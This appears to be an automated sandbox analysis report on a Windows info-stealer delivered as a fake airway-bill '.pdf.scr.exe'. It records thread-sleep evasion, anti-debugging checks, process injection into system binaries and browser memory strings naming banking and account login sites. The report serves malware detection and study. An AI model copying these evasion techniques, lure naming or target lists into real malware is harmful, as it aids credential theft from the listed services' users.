                      Source: C:\Users\Public\Libraries\hdcleziT.pif; API coverage: 0.8 %
                      Source: C:\Users\Public\Libraries\hdcleziT.pif; API coverage: 0.3 %
                      Source: C:\Windows\SysWOW64\proquota.exe TID: 6492; Thread sleep count: 135 > 30
                      Source: C:\Windows\SysWOW64\proquota.exe TID: 6492; Thread sleep time: -270000s >= -30000s
                      Source: C:\Windows\SysWOW64\proquota.exe TID: 6492; Thread sleep count: 9839 > 30
                      Source: C:\Windows\SysWOW64\proquota.exe TID: 6492; Thread sleep time: -19678000s >= -30000s
                      Source: C:\Program Files (x86)\WDmVPKMsYWkiMMtMFxMhEzeJnYuwTWZuIdiFgSkFCldxaFGwlFILXgUMWRDuvixzKBzhBZmNRBJI\WQzLddwiZR.exe TID: 2960; Thread sleep time: -35000s >= -30000s
                      Source: C:\Windows\System32\conhost.exe; Last function: Thread delayed
                      Source: C:\Windows\SysWOW64\proquota.exe; Last function: Thread delayed
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe; Code function: 0_2_02B258B4 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA, 0_2_02B258B4
                      Source: 0j0OId92L.18.dr; Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
                      Source: 0j0OId92L.18.dr; Binary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
                      Source: 0j0OId92L.18.dr; Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
                      Source: 0j0OId92L.18.dr; Binary or memory string: discord.comVMware20,11696487552f
                      Source: 0j0OId92L.18.dr; Binary or memory string: bankofamerica.comVMware20,11696487552x
                      Source: 0j0OId92L.18.dr; Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
                      Source: Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2170331076.000000000071B000.00000004.00000020.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2170331076.0000000000749000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW
                      Source: 0j0OId92L.18.dr; Binary or memory string: ms.portal.azure.comVMware20,11696487552
                      Source: 0j0OId92L.18.dr; Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
                      Source: 0j0OId92L.18.dr; Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
                      Source: 0j0OId92L.18.dr; Binary or memory string: global block list test formVMware20,11696487552
                      Source: 0j0OId92L.18.dr; Binary or memory string: tasks.office.comVMware20,11696487552o
                      Source: WQzLddwiZR.exe, 00000015.00000002.3369230064.00000000006DF000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlll
                      Source: 0j0OId92L.18.dr; Binary or memory string: AMC password management pageVMware20,11696487552
                      Source: Tizelcdh.PIF, 0000000C.00000002.2409057276.0000000000618000.00000004.00000020.00020000.00000000.sdmp, proquota.exe, 00000012.00000002.3369025968.00000000007B9000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3089822122.000001DE5941C000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: 0j0OId92L.18.dr; Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
                      Source: 0j0OId92L.18.dr; Binary or memory string: interactivebrokers.comVMware20,11696487552
                      Source: 0j0OId92L.18.dr; Binary or memory string: dev.azure.comVMware20,11696487552j
                      Source: 0j0OId92L.18.dr; Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
                      Source: 0j0OId92L.18.dr; Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
                      Source: Tizelcdh.PIF, 00000007.00000002.2321834627.000000000067E000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll9
                      Source: 0j0OId92L.18.dr; Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
                      Source: 0j0OId92L.18.dr; Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
                      Source: 0j0OId92L.18.dr; Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
                      Source: 0j0OId92L.18.dr; Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
                      Source: 0j0OId92L.18.dr; Binary or memory string: outlook.office365.comVMware20,11696487552t
                      Source: 0j0OId92L.18.dr; Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
                      Source: 0j0OId92L.18.dr; Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
                      Source: 0j0OId92L.18.dr; Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
                      Source: 0j0OId92L.18.dr; Binary or memory string: outlook.office.comVMware20,11696487552s
                      Source: 0j0OId92L.18.dr; Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
                      Source: 0j0OId92L.18.dr; Binary or memory string: turbotax.intuit.comVMware20,11696487552t
                      Source: 0j0OId92L.18.dr; Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
                      Source: 0j0OId92L.18.dr; Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
                      Source: 0j0OId92L.18.dr; Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe; API call chain: ExitProcess graph end node graph_0-25962
                      Source: C:\Users\Public\Libraries\hdcleziT.pif; Process information queried: ProcessInformation

                      Anti Debugging

                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe; Code function: 0_2_02B3EBE8 GetModuleHandleW,GetProcAddress,CheckRemoteDebuggerPresent, 0_2_02B3EBE8
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe; Process queried: DebugPort
                      Source: C:\Users\Public\Libraries\hdcleziT.pif; Process queried: DebugPort
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIF; Process queried: DebugPort
                      Source: C:\Windows\SysWOW64\proquota.exe; Process queried: DebugPort
                      Source: C:\Users\Public\Libraries\hdcleziT.pif; Code function: 5_2_24CF096E rdtsc 5_2_24CF096E
                      Source: C:\Users\Public\Libraries\hdcleziT.pif; Code function: 5_2_00417B33 LdrLoadDll, 5_2_00417B33
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe; Code function: 0_2_02B38798 LoadLibraryW,GetProcAddress,FreeLibrary, 0_2_02B38798
                      Source: C:\Users\Public\Libraries\hdcleziT.pif; Code function: 5_2_24CB04E5 mov ecx, dword ptr fs:[00000030h] 5_2_24CB04E5
                      Source: C:\Users\Public\Libraries\hdcleziT.pif; Code function: 5_2_24D6A49A mov eax, dword ptr fs:[00000030h] 5_2_24D6A49A
                      Source: C:\Users\Public\Libraries\hdcleziT.pif; Code function: 5_2_24CB64AB mov eax, dword ptr fs:[00000030h] 5_2_24CB64AB
                      Source: C:\Users\Public\Libraries\hdcleziT.pif; Code function: 5_2_24D3A4B0 mov eax, dword ptr fs:[00000030h] 5_2_24D3A4B0
                      Source: C:\Users\Public\Libraries\hdcleziT.pif; Code function: 5_2_24CE44B0 mov ecx, dword ptr fs:[00000030h] 5_2_24CE44B0
                      Source: C:\Users\Public\Libraries\hdcleziT.pif; Code function: 5_2_24D6A456 mov eax, dword ptr fs:[00000030h] 5_2_24D6A456
                      Source: C:\Users\Public\Libraries\hdcleziT.pif; Code function: 5_2_24CEE443 mov eax, dword ptr fs:[00000030h] 5_2_24CEE443
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CA645D mov eax, dword ptr fs:[00000030h]5_2_24CA645D
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CD245A mov eax, dword ptr fs:[00000030h]5_2_24CD245A
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D3C460 mov ecx, dword ptr fs:[00000030h]5_2_24D3C460
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CDA470 mov eax, dword ptr fs:[00000030h]5_2_24CDA470
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CDA470 mov eax, dword ptr fs:[00000030h]5_2_24CDA470
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CDA470 mov eax, dword ptr fs:[00000030h]5_2_24CDA470
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CE8402 mov eax, dword ptr fs:[00000030h]5_2_24CE8402
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CE8402 mov eax, dword ptr fs:[00000030h]5_2_24CE8402
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CE8402 mov eax, dword ptr fs:[00000030h]5_2_24CE8402
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CAE420 mov eax, dword ptr fs:[00000030h]5_2_24CAE420
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CAE420 mov eax, dword ptr fs:[00000030h]5_2_24CAE420
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CAE420 mov eax, dword ptr fs:[00000030h]5_2_24CAE420
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CAC427 mov eax, dword ptr fs:[00000030h]5_2_24CAC427
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D36420 mov eax, dword ptr fs:[00000030h]5_2_24D36420
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D36420 mov eax, dword ptr fs:[00000030h]5_2_24D36420
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D36420 mov eax, dword ptr fs:[00000030h]5_2_24D36420
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D36420 mov eax, dword ptr fs:[00000030h]5_2_24D36420
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D36420 mov eax, dword ptr fs:[00000030h]5_2_24D36420
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D36420 mov eax, dword ptr fs:[00000030h]5_2_24D36420
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D36420 mov eax, dword ptr fs:[00000030h]5_2_24D36420
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CEA430 mov eax, dword ptr fs:[00000030h]5_2_24CEA430
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CEE5CF mov eax, dword ptr fs:[00000030h]5_2_24CEE5CF
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CEE5CF mov eax, dword ptr fs:[00000030h]5_2_24CEE5CF
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CB65D0 mov eax, dword ptr fs:[00000030h]5_2_24CB65D0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CEA5D0 mov eax, dword ptr fs:[00000030h]5_2_24CEA5D0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CEA5D0 mov eax, dword ptr fs:[00000030h]5_2_24CEA5D0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CEC5ED mov eax, dword ptr fs:[00000030h]5_2_24CEC5ED
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CEC5ED mov eax, dword ptr fs:[00000030h]5_2_24CEC5ED
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CDE5E7 mov eax, dword ptr fs:[00000030h]5_2_24CDE5E7
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CDE5E7 mov eax, dword ptr fs:[00000030h]5_2_24CDE5E7
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CDE5E7 mov eax, dword ptr fs:[00000030h]5_2_24CDE5E7
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CDE5E7 mov eax, dword ptr fs:[00000030h]5_2_24CDE5E7
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CDE5E7 mov eax, dword ptr fs:[00000030h]5_2_24CDE5E7
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CDE5E7 mov eax, dword ptr fs:[00000030h]5_2_24CDE5E7
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CDE5E7 mov eax, dword ptr fs:[00000030h]5_2_24CDE5E7
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CDE5E7 mov eax, dword ptr fs:[00000030h]5_2_24CDE5E7
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CB25E0 mov eax, dword ptr fs:[00000030h]5_2_24CB25E0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CE4588 mov eax, dword ptr fs:[00000030h]5_2_24CE4588
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CB2582 mov eax, dword ptr fs:[00000030h]5_2_24CB2582
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CB2582 mov ecx, dword ptr fs:[00000030h]5_2_24CB2582
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CEE59C mov eax, dword ptr fs:[00000030h]5_2_24CEE59C
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D305A7 mov eax, dword ptr fs:[00000030h]5_2_24D305A7
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D305A7 mov eax, dword ptr fs:[00000030h]5_2_24D305A7
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D305A7 mov eax, dword ptr fs:[00000030h]5_2_24D305A7
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CD45B1 mov eax, dword ptr fs:[00000030h]5_2_24CD45B1
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CD45B1 mov eax, dword ptr fs:[00000030h]5_2_24CD45B1
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CB8550 mov eax, dword ptr fs:[00000030h]5_2_24CB8550
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CB8550 mov eax, dword ptr fs:[00000030h]5_2_24CB8550
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CE656A mov eax, dword ptr fs:[00000030h]5_2_24CE656A
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CE656A mov eax, dword ptr fs:[00000030h]5_2_24CE656A
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CE656A mov eax, dword ptr fs:[00000030h]5_2_24CE656A
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D46500 mov eax, dword ptr fs:[00000030h]5_2_24D46500
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D84500 mov eax, dword ptr fs:[00000030h]5_2_24D84500
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D84500 mov eax, dword ptr fs:[00000030h]5_2_24D84500
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D84500 mov eax, dword ptr fs:[00000030h]5_2_24D84500
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D84500 mov eax, dword ptr fs:[00000030h]5_2_24D84500
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D84500 mov eax, dword ptr fs:[00000030h]5_2_24D84500
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D84500 mov eax, dword ptr fs:[00000030h]5_2_24D84500
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D84500 mov eax, dword ptr fs:[00000030h]5_2_24D84500
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CDE53E mov eax, dword ptr fs:[00000030h]5_2_24CDE53E
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CDE53E mov eax, dword ptr fs:[00000030h]5_2_24CDE53E
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CDE53E mov eax, dword ptr fs:[00000030h]5_2_24CDE53E
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CDE53E mov eax, dword ptr fs:[00000030h]5_2_24CDE53E
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CDE53E mov eax, dword ptr fs:[00000030h]5_2_24CDE53E
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CC0535 mov eax, dword ptr fs:[00000030h]5_2_24CC0535
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CC0535 mov eax, dword ptr fs:[00000030h]5_2_24CC0535
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CC0535 mov eax, dword ptr fs:[00000030h]5_2_24CC0535
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CC0535 mov eax, dword ptr fs:[00000030h]5_2_24CC0535
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CC0535 mov eax, dword ptr fs:[00000030h]5_2_24CC0535
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CC0535 mov eax, dword ptr fs:[00000030h]5_2_24CC0535
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CEA6C7 mov ebx, dword ptr fs:[00000030h]5_2_24CEA6C7
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CEA6C7 mov eax, dword ptr fs:[00000030h]5_2_24CEA6C7
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D2E6F2 mov eax, dword ptr fs:[00000030h]5_2_24D2E6F2
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D2E6F2 mov eax, dword ptr fs:[00000030h]5_2_24D2E6F2
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D2E6F2 mov eax, dword ptr fs:[00000030h]5_2_24D2E6F2
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D2E6F2 mov eax, dword ptr fs:[00000030h]5_2_24D2E6F2
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D306F1 mov eax, dword ptr fs:[00000030h]5_2_24D306F1
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D306F1 mov eax, dword ptr fs:[00000030h]5_2_24D306F1
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CB4690 mov eax, dword ptr fs:[00000030h]5_2_24CB4690
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CB4690 mov eax, dword ptr fs:[00000030h]5_2_24CB4690
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CEC6A6 mov eax, dword ptr fs:[00000030h]5_2_24CEC6A6
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CE66B0 mov eax, dword ptr fs:[00000030h]5_2_24CE66B0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CCC640 mov eax, dword ptr fs:[00000030h]5_2_24CCC640
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CEA660 mov eax, dword ptr fs:[00000030h]5_2_24CEA660
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CEA660 mov eax, dword ptr fs:[00000030h]5_2_24CEA660
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D7866E mov eax, dword ptr fs:[00000030h]5_2_24D7866E
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D7866E mov eax, dword ptr fs:[00000030h]5_2_24D7866E
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CE2674 mov eax, dword ptr fs:[00000030h]5_2_24CE2674
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CC260B mov eax, dword ptr fs:[00000030h]5_2_24CC260B
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CC260B mov eax, dword ptr fs:[00000030h]5_2_24CC260B
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CC260B mov eax, dword ptr fs:[00000030h]5_2_24CC260B
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CC260B mov eax, dword ptr fs:[00000030h]5_2_24CC260B
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CC260B mov eax, dword ptr fs:[00000030h]5_2_24CC260B
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CC260B mov eax, dword ptr fs:[00000030h]5_2_24CC260B
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CC260B mov eax, dword ptr fs:[00000030h]5_2_24CC260B
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CF2619 mov eax, dword ptr fs:[00000030h]5_2_24CF2619
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D2E609 mov eax, dword ptr fs:[00000030h]5_2_24D2E609
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CB262C mov eax, dword ptr fs:[00000030h]5_2_24CB262C
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CCE627 mov eax, dword ptr fs:[00000030h]5_2_24CCE627
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CE6620 mov eax, dword ptr fs:[00000030h]5_2_24CE6620
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CE8620 mov eax, dword ptr fs:[00000030h]5_2_24CE8620
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CBC7C0 mov eax, dword ptr fs:[00000030h]5_2_24CBC7C0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D307C3 mov eax, dword ptr fs:[00000030h]5_2_24D307C3
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CD27ED mov eax, dword ptr fs:[00000030h]5_2_24CD27ED
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CD27ED mov eax, dword ptr fs:[00000030h]5_2_24CD27ED
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CD27ED mov eax, dword ptr fs:[00000030h]5_2_24CD27ED
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CB47FB mov eax, dword ptr fs:[00000030h]5_2_24CB47FB
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CB47FB mov eax, dword ptr fs:[00000030h]5_2_24CB47FB
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D3E7E1 mov eax, dword ptr fs:[00000030h]5_2_24D3E7E1
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D5678E mov eax, dword ptr fs:[00000030h]5_2_24D5678E
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CB07AF mov eax, dword ptr fs:[00000030h]5_2_24CB07AF
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D647A0 mov eax, dword ptr fs:[00000030h]5_2_24D647A0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CE674D mov esi, dword ptr fs:[00000030h]5_2_24CE674D
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CE674D mov eax, dword ptr fs:[00000030h]5_2_24CE674D
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CE674D mov eax, dword ptr fs:[00000030h]5_2_24CE674D
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D34755 mov eax, dword ptr fs:[00000030h]5_2_24D34755
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D3E75D mov eax, dword ptr fs:[00000030h]5_2_24D3E75D
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CB0750 mov eax, dword ptr fs:[00000030h]5_2_24CB0750
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CF2750 mov eax, dword ptr fs:[00000030h]5_2_24CF2750
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CF2750 mov eax, dword ptr fs:[00000030h]5_2_24CF2750
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CB8770 mov eax, dword ptr fs:[00000030h]5_2_24CB8770
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CC0770 mov eax, dword ptr fs:[00000030h]5_2_24CC0770
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CC0770 mov eax, dword ptr fs:[00000030h]5_2_24CC0770
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CC0770 mov eax, dword ptr fs:[00000030h]5_2_24CC0770
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CC0770 mov eax, dword ptr fs:[00000030h]5_2_24CC0770
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CC0770 mov eax, dword ptr fs:[00000030h]5_2_24CC0770
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CC0770 mov eax, dword ptr fs:[00000030h]5_2_24CC0770
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CC0770 mov eax, dword ptr fs:[00000030h]5_2_24CC0770
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CC0770 mov eax, dword ptr fs:[00000030h]5_2_24CC0770
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CC0770 mov eax, dword ptr fs:[00000030h]5_2_24CC0770
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CC0770 mov eax, dword ptr fs:[00000030h]5_2_24CC0770
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CC0770 mov eax, dword ptr fs:[00000030h]5_2_24CC0770
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CC0770 mov eax, dword ptr fs:[00000030h]5_2_24CC0770
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CEC700 mov eax, dword ptr fs:[00000030h]5_2_24CEC700
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CB0710 mov eax, dword ptr fs:[00000030h]5_2_24CB0710
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CE0710 mov eax, dword ptr fs:[00000030h]5_2_24CE0710
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D2C730 mov eax, dword ptr fs:[00000030h]5_2_24D2C730
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CEC720 mov eax, dword ptr fs:[00000030h]5_2_24CEC720
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CEC720 mov eax, dword ptr fs:[00000030h]5_2_24CEC720
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CE273C mov eax, dword ptr fs:[00000030h]5_2_24CE273C
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CE273C mov ecx, dword ptr fs:[00000030h]5_2_24CE273C
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CE273C mov eax, dword ptr fs:[00000030h]5_2_24CE273C
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D320DE mov eax, dword ptr fs:[00000030h]5_2_24D320DE
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CB80E9 mov eax, dword ptr fs:[00000030h]5_2_24CB80E9
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CAA0E3 mov ecx, dword ptr fs:[00000030h]5_2_24CAA0E3
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D360E0 mov eax, dword ptr fs:[00000030h]5_2_24D360E0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CAC0F0 mov eax, dword ptr fs:[00000030h]5_2_24CAC0F0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CF20F0 mov ecx, dword ptr fs:[00000030h]5_2_24CF20F0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CB208A mov eax, dword ptr fs:[00000030h]5_2_24CB208A
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CA80A0 mov eax, dword ptr fs:[00000030h]5_2_24CA80A0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D760B8 mov eax, dword ptr fs:[00000030h]5_2_24D760B8
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D760B8 mov ecx, dword ptr fs:[00000030h]5_2_24D760B8
